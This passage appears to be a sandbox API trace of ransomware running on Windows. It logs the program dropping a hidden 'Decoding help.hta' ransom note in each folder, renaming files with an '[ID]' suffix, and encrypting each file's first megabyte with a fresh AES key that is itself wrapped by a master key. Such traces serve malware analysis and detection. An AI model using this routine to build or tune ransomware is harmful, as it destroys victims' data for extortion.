lpFindFileData=0x1e25fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0045.283] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" [0045.283] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned 79 [0045.284] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Decoding help.hta" [0045.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\decoding help.hta")) returned 0xffffffff [0045.284] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0045.520] WriteFile (in: hFile=0x37c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1e25fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1e25fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.521] CloseHandle (hObject=0x37c) returned 1 [0045.521] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.715] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Proof.cab") returned -1 [0048.715] lstrlenW (lpString="Proof.cab") returned 9 [0048.715] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" [0048.715] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned 79 [0048.715] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpString2="Proof.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" [0048.715] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" [0048.715] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0048.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.894] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0051.894] CreateFileMappingA (hFile=0x548, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x738 [0051.894] CryptAcquireContextA (in: phProv=0x1e25fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1e25fcec*=0x3449820) returned 1 [0054.885] CryptGenKey (in: hProv=0x3449820, Algid=0x6610, dwFlags=0x1, phKey=0x1e25fce8 | out: phKey=0x1e25fce8*=0x5e2d70) returned 1 [0054.885] CryptExportKey (in: hKey=0x5e2d70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1e25fbe4, pdwDataLen=0x1e25fce4 | out: pbData=0x1e25fbe4*, pdwDataLen=0x1e25fce4*=0x2c) returned 1 [0054.885] MapViewOfFile (hFileMappingObject=0x738, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x3810000 [0054.889] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e25fbe4*, pdwDataLen=0x1e25fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1e25fbe4*, pdwDataLen=0x1e25fcf8*=0x100) returned 1 [0054.890] CryptEncrypt (in: hKey=0x5e2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3810000, pdwDataLen=0x1e25fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x3810000*, pdwDataLen=0x1e25fce4*=0x100000) returned 1 [0055.168] UnmapViewOfFile (lpBaseAddress=0x3810000) returned 1 [0055.181] CloseHandle (hObject=0x738) returned 1 [0055.181] CryptDestroyKey (hKey=0x5e2d70) returned 1 [0055.181] CryptReleaseContext (hProv=0x3449820, dwFlags=0x0) returned 1 [0055.181] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.181] WriteFile (in: hFile=0x548, lpBuffer=0x1e25fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1e25fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1e25fbe4*, lpNumberOfBytesWritten=0x1e25fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.149] WriteFile (in: hFile=0x548, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1e25fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1e25fcf8*=0x500, lpOverlapped=0x0) returned 1 [0057.484] CloseHandle (hObject=0x548) returned 1 [0057.484] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0057.485] FindNextFileW (in: hFindFile=0x5a5bf0, lpFindFileData=0x1e25fd30 | out: lpFindFileData=0x1e25fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0057.485] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" [0057.485] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned 79 [0057.485] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Decoding help.hta" [0057.485] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\decoding help.hta")) returned 0x1 [0057.485] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Proof.msi") returned -1 [0057.485] lstrlenW (lpString="Proof.msi") returned 9 [0057.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" [0057.485] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned 79 [0057.485] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpString2="Proof.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" [0057.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" [0057.485] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0057.485] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.486] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0057.486] CreateFileMappingA (hFile=0x548, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2b0 [0057.486] CryptAcquireContextA (in: phProv=0x1e25fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1e25fcec*=0x3449930) returned 1 [0060.144] CryptGenKey (in: hProv=0x3449930, Algid=0x6610, dwFlags=0x1, phKey=0x1e25fce8 | out: phKey=0x1e25fce8*=0x5e2e30) returned 1 [0060.144] CryptExportKey (in: hKey=0x5e2e30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1e25fbe4, pdwDataLen=0x1e25fce4 | out: pbData=0x1e25fbe4*, pdwDataLen=0x1e25fce4*=0x2c) returned 1 [0060.144] MapViewOfFile (hFileMappingObject=0x2b0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd7200) returned 0x6890000 [0062.932] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e25fbe4*, pdwDataLen=0x1e25fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1e25fbe4*, pdwDataLen=0x1e25fcf8*=0x100) returned 1 [0062.932] CryptEncrypt (hKey=0x5e2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6890000, pdwDataLen=0x1e25fce4*=0xd7200, dwBufLen=0xd7200) Thread: id = 458 os_tid = 0x114 [0045.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*", lpFindFileData=0x1e39fd30 | out: lpFindFileData=0x1e39fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5c30 [0045.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.295] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0x1e39fd30 | out: lpFindFileData=0x1e39fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.295] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.295] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0x1e39fd30 | out: lpFindFileData=0x1e39fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0045.296] lstrcpyW (in: lpString1=0x5e88c10, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" [0045.296] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned 79 [0045.296] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Decoding help.hta" [0045.296] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\decoding help.hta")) returned 0xffffffff [0045.296] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0045.524] WriteFile (in: hFile=0x37c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1e39fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1e39fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.525] CloseHandle (hObject=0x37c) returned 1 [0045.525] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.718] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Proof.cab") returned -1 [0048.718] lstrlenW (lpString="Proof.cab") returned 9 [0048.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" [0048.718] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned 79 [0048.718] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpString2="Proof.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" [0048.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" [0048.718] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0048.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0050.882] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0050.882] CreateFileMappingA (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x73c [0050.882] CryptAcquireContextA (in: phProv=0x1e39fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1e39fcec*=0x34499b8) returned 1 [0054.589] CryptGenKey (in: hProv=0x34499b8, Algid=0x6610, dwFlags=0x1, phKey=0x1e39fce8 | out: phKey=0x1e39fce8*=0x671c70) returned 1 [0054.589] CryptExportKey (in: hKey=0x671c70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1e39fbe4, pdwDataLen=0x1e39fce4 | out: pbData=0x1e39fbe4*, pdwDataLen=0x1e39fce4*=0x2c) returned 1 [0054.589] MapViewOfFile (hFileMappingObject=0x73c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x11760000 [0054.601] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e39fbe4*, pdwDataLen=0x1e39fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1e39fbe4*, pdwDataLen=0x1e39fcf8*=0x100) returned 1 [0054.601] CryptEncrypt (in: hKey=0x671c70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x11760000, pdwDataLen=0x1e39fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x11760000*, pdwDataLen=0x1e39fce4*=0x100000) returned 1 [0055.696] UnmapViewOfFile (lpBaseAddress=0x11760000) returned 1 [0055.726] CloseHandle (hObject=0x73c) returned 1 [0055.726] CryptDestroyKey (hKey=0x671c70) returned 1 [0055.726] CryptReleaseContext (hProv=0x34499b8, dwFlags=0x0) returned 1 [0055.726] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.726] WriteFile (in: hFile=0x460, lpBuffer=0x1e39fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1e39fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1e39fbe4*, lpNumberOfBytesWritten=0x1e39fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.273] WriteFile (in: hFile=0x460, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1e39fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1e39fcf8*=0x500, lpOverlapped=0x0) returned 1 [0057.492] CloseHandle (hObject=0x460) returned 1 [0057.492] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0057.493] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0x1e39fd30 | out: lpFindFileData=0x1e39fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0057.493] lstrcpyW (in: lpString1=0x2a8a87f0, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" [0057.493] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned 79 [0057.493] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Decoding help.hta" [0057.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\decoding help.hta")) returned 0x1 [0057.493] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Proof.msi") returned -1 [0057.493] lstrlenW 